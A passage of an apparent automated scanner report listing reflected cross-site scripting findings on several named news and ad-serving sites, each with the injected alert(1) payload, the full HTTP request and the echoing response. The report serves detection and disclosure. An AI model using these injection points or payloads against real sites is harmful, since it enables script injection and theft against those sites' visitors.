Host:   http://data.usatoday.net
Path:   /apps/InsidePage

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d135b"%3balert(1)//12ce116bf28 was submitted in the url parameter. This input was echoed as d135b";alert(1)//12ce116bf28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apps/InsidePage?var=blocks&url=http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htmd135b"%3balert(1)//12ce116bf28 HTTP/1.1
Host: data.usatoday.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Length: 12749
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Cache-Control: no-cache
Expires: Mon, 09 May 2011 15:38:00 GMT
Date: Mon, 09 May 2011 15:38:00 GMT
Connection: close

var blocks = {"url": "http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htmd135b";alert(1)//12ce116bf28","ref": "","title": "12ce116bf28","section": "Weather","nav": "<ul id=\"section-nav\">
...[SNIP]...

2.71. http://data.usatoday.net/apps/InsidePage [var parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.usatoday.net
Path:   /apps/InsidePage

Issue detail

The value of the var request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 734a0%3balert(1)//0e9845649fa was submitted in the var parameter. This input was echoed as 734a0;alert(1)//0e9845649fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apps/InsidePage?var=blocks734a0%3balert(1)//0e9845649fa&url=http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm HTTP/1.1
Host: data.usatoday.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Length: 12743
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Cache-Control: no-cache
Expires: Mon, 09 May 2011 15:38:00 GMT
Date: Mon, 09 May 2011 15:38:00 GMT
Connection: close

var blocks734a0;alert(1)//0e9845649fa = {"url": "http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm","ref": "","title": "Floods","section": "Weather","nav": "<ul id=\"section-nav\">
...[SNIP]...

2.72. http://ds.addthis.com/red/psi/sites/www.fox8live.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.fox8live.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 18cfc<script>alert(1)</script>6e94a043035 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.fox8live.com/p.json?callback=_ate.ad.hpr18cfc<script>alert(1)</script>6e94a043035&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.fox8live.com%2Fnews%2Flocal%2Fstory%2FSt-Bernard-prepares-for-rising-Mississippi-River%2FvJUO9a9n60iNAXZ6QCm2oQ.cspx&xp66c HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; di=%7B%7D..1304951889.1FE|1304951889.60; dt=X; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 227
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 09 May 2011 15:38:39 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 08 Jun 2011 15:38:39 GMT; Path=/
Set-Cookie: di=%7B%7D..1304951889.1FE|1304955519.1OD|1304951889.60; Domain=.addthis.com; Expires=Wed, 08-May-2013 15:38:02 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Mon, 09 May 2011 15:38:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 09 May 2011 15:38:39 GMT
Connection: close

_ate.ad.hpr18cfc<script>alert(1)</script>6e94a043035({"urls":["http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dab4fa85facd099"],"segments" : ["1OD"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

2.73. http://event.adxpose.com/event.flow [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 388c8<script>alert(1)</script>6f81c5c2df was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.csmonitor.com%2FBusiness&uid=ZC45X9Axu6NOUFfX_289669388c8<script>alert(1)</script>6f81c5c2df&xy=0%2C0&wh=300%2C250&vchannel=69112&cid=172249&iad=1304955321345-89810743578709660&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6B586A135B60950B5DCB0D4C24B6EBC5; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 144
Date: Mon, 09 May 2011 15:35:29 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_289669388c8<script>alert(1)</script>6f81c5c2df");

2.74. http://finance.fox8live.com/inergize.wvue [Module parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://finance.fox8live.com
Path:   /inergize.wvue

Issue detail

The value of the Module request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e0df'-alert(1)-'3ecdc21eb2c was submitted in the Module parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inergize.wvue?Module=snapshot21e0df'-alert(1)-'3ecdc21eb2c&Output=JS HTTP/1.1
Host: finance.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:03 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Mon, 09 May 2011 15:37:03 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 794


var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Ffinance.fox8live.com%2Finergize.wvue%3FHTTP_HOST%3Dfinance.fox8live.com%26HTTPS%3Doff%26Module%3Dsnapshot21e0df'-alert(1)-'3ecdc21eb2c%26Output%3DJS&Type=widget&Client=inergize.wvue&rand=' + Math.random();
head.appendChild(script);

_qoptions={
qacct:"p-0cUI5xpPZj8YQ"
};
var head=document.getElementsByTagName('head')[0];
var scri
...[SNIP]...

2.75. http://finance.fox8live.com/inergize.wvue [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://finance.fox8live.com
Path:   /inergize.wvue

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98e61'-alert(1)-'1eee3fb9769 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inergize.wvue98e61'-alert(1)-'1eee3fb9769?Module=snapshot2&Output=JS HTTP/1.1
Host: finance.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:05 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Mon, 09 May 2011 15:37:05 GMT
Expires: Mon, 09 May 2011 15:38:05 GMT
X-Cache: MISS from squid2.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid2.sv1.financialcontent.com:3128
Via: 1.0 squid2.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 41367

document.write('<style>\n');
document.write('\n');
document.write('\/* Global CSS Styles *\/\n');
document.write('.fcwidget * {\n');
document.write(' padding:0px; \n');
document.write(' border:0px; \n
...[SNIP]...
)[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Ffinance.fox8live.com%2Finergize.wvue98e61'-alert(1)-'1eee3fb9769%3FHTTP_HOST%3Dfinance.fox8live.com%26HTTPS%3Doff%26Module%3Dsnapshot2%26Output%3DJS&Type=widget&Client=inergize.wvue98e61'-alert(1)-'1eee3fb9769&rand=' + Math.random();
head.appendChild(script);

_
...[SNIP]...

2.76. http://finance.fox8live.com/inergize.wvue [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://finance.fox8live.com
Path:   /inergize.wvue

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50502'-alert(1)-'40811c352d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /inergize.wvue?Module=snapshot2&Output=JS&50502'-alert(1)-'40811c352d1=1 HTTP/1.1
Host: finance.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:04 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Mon, 09 May 2011 15:37:04 GMT
Expires: Mon, 09 May 2011 15:38:04 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 40716

document.write('<style>\n');
document.write('\n');
document.write('\/* Global CSS Styles *\/\n');
document.write('.fcwidget * {\n');
document.write(' padding:0px; \n');
document.write(' border:0px; \n
...[SNIP]...
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Ffinance.fox8live.com%2Finergize.wvue%3FHTTP_HOST%3Dfinance.fox8live.com%26HTTPS%3Doff%26Module%3Dsnapshot2%26Output%3DJS%2650502'-alert(1)-'40811c352d1%3D1&Type=widget&Client=inergize.wvue&rand=' + Math.random();
head.appendChild(script);

_qoptions={
qacct:"p-0cUI5xpPZj8YQ"
};
var head=document.getElementsByTagName('head')[0];
var script=documen
...[SNIP]...

2.77. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [PluID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of the PluID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa553"-alert(1)-"6db1ea67994 was submitted in the PluID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0aa553"-alert(1)-"6db1ea67994&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F353BA1915795343A0F9402D71BD02A2; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:52 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0aa553"-alert(1)-"6db1ea67994&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$",
   adsafeSep : "&",
   re
...[SNIP]...

2.78. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eec2b"-alert(1)-"73b143e8b37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.comeec2b"-alert(1)-"73b143e8b37/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=75C77546E2FDBC3BDA7E9D1F94CBDA6B; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:52 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.comeec2b"-alert(1)-"73b143e8b37/9766/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/25
...[SNIP]...

2.79. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c93f2"-alert(1)-"d26d1447152 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766c93f2"-alert(1)-"d26d1447152/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=263751F3FB1658F4A13DD4C934811422; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:53 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766c93f2"-alert(1)-"d26d1447152/90645/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B4
...[SNIP]...

2.80. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41d4b"-alert(1)-"2bc1aa27d11 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/9064541d4b"-alert(1)-"2bc1aa27d11/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BDE6C67ED5D1DA3D339CCD1B475C599B; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:53 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/9064541d4b"-alert(1)-"2bc1aa27d11/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B4158923
...[SNIP]...

2.81. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afd0f"-alert(1)-"91890140fec was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipeafd0f"-alert(1)-"91890140fec/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9A826F056C48F6FF462E93381B905229; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:53 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipeafd0f"-alert(1)-"91890140fec/adServer.bs?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%
...[SNIP]...

2.82. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e664a"-alert(1)-"1983e917118 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bse664a"-alert(1)-"1983e917118?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8E2371CCF36BB4CD1C3903BAFA7DB1B8; Path=/
Content-Type: text/javascript
Content-Length: 8043
Date: Mon, 09 May 2011 15:39:53 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.npr.org/templates/reg/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bse664a"-alert(1)-"1983e917118?cn=rsb&c=28&pli=2320695&PluID=0&w=300&h=250&ord=2660552&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/g%3B240220354%3B0-0%3B0%3B60978287%3B4307-300/250%3B41589231/41607018/1%3B%3B%7Esscs
...[SNIP]...

2.83. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/bs.serving-sys.com/9766/90645/BurstingPipe/adServer.bs

Issue detail

